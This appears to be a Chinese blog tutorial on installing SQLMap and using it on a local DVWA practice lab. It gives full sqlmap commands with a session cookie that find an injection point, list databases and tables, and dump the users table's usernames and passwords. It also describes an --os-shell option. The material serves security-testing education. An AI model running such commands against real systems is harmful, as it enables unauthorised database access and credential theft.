安全测试必备工具——SQLMap 安装及基本应用

最新推荐文章于 2024-09-04 17:29:53 发布
最新推荐文章于 2024-09-04 17:29:53 发布
阅读量910 收藏 29
点赞数 10
分类专栏: 软件测试 技术分享 自动化测试 文章标签: 软件测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73332379/article/details/139600090
版权

检测SQL注入漏洞的专用工具是安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装及使用。

1、什么是SQLMap?

SQLmap是一款由python开发的用来检测与利用SQL注入漏洞的免费开源工具。支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBMDB2、SQLite等数据库。有一个非常棒的特性,即对检测与利用的自动化处理(如数据库指纹、访问底层文件系统、执行命令)。

2、SQLMap下载

官方网站下载:http://sqlmap.org/

图片

这里选择Github去下载

图片

3、win10下SQLMap安装

1、先安装好python环境,不管是2还是3版本都支持(python安装过程略,自行百度解决)。安装后可cmd命令窗口输入python -V 查看到版本信息即为成功。

在这里插入图片描述

2、将下载好的sqlmap-master.zip压缩包,解压到自己需要的目录

3、进入解压后的目录,在显示目录路径位置输入cmd回车,在弹出的命令行窗口,输入 python sqlmap.py即开启工具使用

图片

4、SQLMap的常用参数

-u∶指定目标URL进行sql注入检测

–batch:自动去做问题应答

–cookie :当前会话的cookie值

–dbs: 查询当前网站所有数据库

-D:指定数据库名

–tables:查询数据库下的所有表名

-T:指定表名

–columns:指定查询所有字段

-C:指定字段的名称

–dump:查询并导出其数据,拖库

–current-db:获取当前数据库

–current-user :获取当前登录数据库用户名称

–users:查询数据库的所有用户

–password:查询数据库用户的密码

–os-shell:直接返回一个shell(如果存在的话)

-flush-session 刷新session文件

如果不想用之前缓存这个目标的session文件,可以使用这个参数。会清空之前的session,重新测试该目标。

5、SQLMap的基本应用

基于DVWA靶场以下模块,进行SQLMap实操演示

图片

1、注入判断 -u

输入:python sqlmap.py -u http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit。去进行操作–会报错,需要登录。

图片

图片

2、添加cookie绕过登录

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low”。

运行过程中需要用户输入y/n才能进入下一步操作,如果希望跳过这些,可以在命令末尾加 --batch

图片

图片

通过以上结果可知,存在SQL注入点。

3、查询当下所有数据库

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” --dbs --batch

图片

4、查询指定库下的表名

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” -D dvwa --tables

图片

5、查指定表的所有字段

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” -D dvwa -T users --columns

图片

6、查询字段内容

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” -D dvwa -T users -C user,password --dump

这个过程有点慢,请耐心等待,最终得到表的所有用户及明文密码信息。

图片

 

总结:

感谢每一个认真阅读我文章的人!!!

作为一位过来人也是希望大家少走一些弯路,如果你不想再体验一次学习时找不到资料,没人解答问题,坚持几天便放弃的感受的话,在这里我给大家分享一些自动化测试的学习资源,希望能给你前进的路上带来帮助。

软件测试面试文档

我们学习必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料,并且有字节大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。

 

          视频文档获取方式:
这份文档和视频资料,对于想从事【软件测试】的朋友来说应该是最全面最完整的备战仓库,这个仓库也陪伴我走过了最艰难的路程,希望也能帮助到你!以上均可以分享,点下方小卡片即可自行领取。

美团程序员
关注
专栏目录
Web安全扫描工具搭建与使用(附扫描工具安装包)
悦分享
11-06 335
WebInspect也是一款比较常见的Web安全动态扫描工具,它的安全规则库由世界领先的Web安全专家每日维护和更新(与fortify同一个安全团队),有一些创新的评估技术,例如同步扫描和审核及并发应用程序扫描,快速准确地自动执行 Web 应用程序安全测试和 Web 服务安全测试。基于Java的Web代理的方式,用于评估Web应用程序漏洞。Nikto是一款专业的web服务器扫描工具,软件采用命令行的执行方式,可以对服务器进行快速的检测,从而发现潜在的危险以及CGI等问题,是网络管理人员的必备工具
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
热门推荐
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了
bdfcfff77fa的博客
03-22 3087
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术。
Jmeter压力测试实例
joy的博客
12-08 2341
Jmeter压力测试实例简介1. 配置Jmeter登录设置全局变量考试接口2. 测试结果 简介 本实例测试多用户登录后提交考试的接口。 1. 配置Jmeter 登录 因为重点不是测试登录,我们只需要获取登录后的信息。新建setup线程组,只登录一次。 新建http请求,配置协议,ip,端口及请求需要的参数。登录接口需要参数为用户名,密码及验证码。同时测试多个用户登录,不能一个个传。 新建csv数据文件,从文件中导入用户名密码信息。 登录返回的信息为json格式,我们可以使用json提取器来获取token
SQLMAP安装
最新发布
m0_69588920的博客
09-04 287
sqlmap官网下载也可以去GitHub上面找一下 链接。打开sqlmap文件夹输入cmd启动命令符。通过python sqlmap.py 启动。那个版本都可以,我这边用的是2.0版本的。使用win键+S快捷搜索"编辑环境变量"在path里面添加你的python路径。1.配置python环境。3.下载sqlmap。4.应用sqlmap
Python使用指定端口进行http请求的例子
2301_79535733的博客
03-21 536
测试发现是走的54321端口。测试OK,可以直接在。
通用接口测试用例设计
weixin_34228617的博客
05-13 2277
1.通过性验证:   首先肯定要保证这个接口功能是好使的,也就是正常的通过性测试,按照接口文档上的参数,正常传入,是否可以返回正确的结果。 2.参数组合:   现在有一个操作商品的接口,有个字段type,传1的时候代表修改商品,商品id、商品名称、价格有一个是必传的,type传2的时候是删除商品,商品id是必传的,这样的,就要测参数组合了,type传1的时候,只传商品名称能不能修改成功...
JMeter使用总结
weixin_34259232的博客
06-01 392
使用JMeter做压力测试 1.下载Jmeter 地址:http://jmeter.apache.org/download_jmeter.cgi  2.启动jmeter 运行bin/jmeter.bat 3.添加线程组 在TestPlan节点上右键,Add-->Threads(Users)-->Thread Group。 Number of Threads (Us...
Jmeter压力测试(简单的http请求)-实例
weixin_33716557的博客
07-05 176
服务端系分提供的某接口样例为:   评估后可采用使用jmeter进行压力测试的步骤为: 启动jmeter:在bin下点击jmeter.bat,运行jmeter   2. 创建测试计划: 默认启动jmeter时会加载一个测试技术模板 3. 保存测试计划:修改名称为http_demo,点击保存,选择保存路径 4. 添加线程组 右键左边树中的测试计划“h...
sqlmapproject-sqlmap-1.7.4-3-g4f76144.zip
01-06
总的来说,这个压缩包包含了一个强大的SQL注入检测工具——SQLMap,以及可能的一个图像隐写分析工具。用户可以使用SQLMap来测试网站的安全性,查找并利用潜在的SQL注入漏洞。而图像隐写分析工具则可以帮助他们在图像...
SQL注入大餐必备餐具SQLMA
11-06
### SQL注入大餐必备餐具——SQLMA #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来操纵后端数据库,进而获取敏感信息或控制数据库。为了有效地进行SQL...
Apache JMeter压力测试示例脚本
08-28
Apache JMeter压力测试示例脚本
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8061
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Jmeter进行压力测试的一个案例
kalvin_y_liu的博客
05-27 1329
IPP性能压力测试过程 1.总体设置说明: 1200用户在线测试设置说明(参数说明见文档后面说明) 1200样本结果截图: 200用户登录测试说明 200样本结果截图: 测试工具参数设置说明: 线程数:并发数量,能跑多少量。具体说是一次存在多少用户同时访问,在本系统代表模拟1200用户和200用户进行并发性能测试。 Rame-Up Period(in seconds):表示JMeter每隔多少秒发动并发。理解成准备时长:设置虚拟用户数需要多长时间全部启动。如果线程数是20,准备时长为10,那
UI自动化测试之Jenkins配置
weixin_34413357的博客
12-28 537
前一段时间帮助团队搭建了UI自动化环境,这里将Jenkins环境的一些配置分享给大家。 背景: 团队下半年的目标之一是实现自动化测试,这里要吐槽一下,之前开发的测试平台了,最初的目的是用来做接口自动化测试和性能测试,但由于各种原因,接口自动化测试那部分功能整个废弃掉了,其中和易用性有很大关系,另外,也和我们公司的接口业务也有关。不过性能测试功能开发同学用的很欢快,还有接口的管理,目前是连接前端与后...
2024年【软件测试】探索和学习SDLC与软件测试的关系,顺利通过阿里软件测试岗面试
2401_84563734的博客
05-08 491
Testing is part of every stage in modern SDLC models. (整合:在现代SDLC模型的每个阶段,测试都是一个组成部分。
JMeter压力测试实例
foam9的博客
04-19 650
JMeter压力测试实例 一款APP中不必每一个接口都要进行压力测试,可以选择人们常用的某个接口,比如登录、注册等接口。 假设登录接口如下: https://testMedicineOnline/medicine-api/index/category 我们现需要对该接口进行压力测试。 第一步:我们需要在Jmeter里面创建一个线程组 接下来我们需要设置线程组线程属性,例如: 第二步:在线程组下新建一个HTTP请求 在Http请求中输入IP,端口号,以及路径、params等参数信息 第三步:添加Http
【Jmeter】Jmeter压力测试简单示例
heni6560的博客
10-31 385
  1.新建线程组 2.添加http请求默认值 3.添加http请求 4.添加参数:(除了csv,还可以连接数据库,使用数据库数据作为参数) 5.killPhone是cookie的参数,添加http cookie管理器 6.添加查看结果树 还可以添加其他监听器。...
sqlmap安装详细教程
07-24
SQLMap 是一款开源工具,主要用于自动检测 SQL 注入漏洞,并能尝试从数据库中提取数据、修改数据、甚至控制整个数据库服务器。如果你想要安装 SQLMap,这里有一个简单的步骤指南供你参考: ### 安装依赖环境 为了安装 SQLMap,你需要先安装 Python 的几个基本模块,包括 `pip` 和 `wheel`。 1. **安装 pip** (如果尚未安装) - 对于 Windows 用户: ```bash python get-pip.py ``` - 对于基于 Linux 或 macOS 系统的用户,通常已经预装了 pip,可以跳过此步。 2. **更新 pip** - 升级 pip 到最新版本: ```bash pip install --upgrade pip ``` 3. **安装 wheel** - 安装 wheel 包管理工具: ```bash pip install wheel ``` ### 安装 SQLMap 有了上面的基础环境准备好了之后,你可以开始安装 SQLMap 本身了: ```bash pip install sqlmap ``` ### 检查安装是否成功 完成上述安装命令后,可以通过运行 `sqlmap --version` 来检查 SQLMap 是否已正确安装并可用。 ### 使用 SQLMap 进行扫描 一旦 SQLMap 安装完毕并且确认可用,你可以使用它来探测目标网站的 SQL 注入点。下面是一个简单的示例命令: ```bash sqlmap -u "http://target.example.com/path_to_sql_injection.php" --data="field1=value&field2=value" ``` 在这个命令中: - `-u` 参数指定了你要测试的 URL。 - `--data` 参数表示提交给页面的数据,其中应该包含注入点的参数名及其值。 记得将 `"http://target.example.com/path_to_sql_injection.php"` 替换成实际的攻击点 URL,同时确保你有权利对这个URL进行安全评估。 --- ### 相关问题: 1. SQLMap 可以处理哪些类型的数据库系统? 2. 如何利用 SQLMap 执行更高级的查询操作? 3. 如果在使用 SQLMap 时遇到权限问题怎么办?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值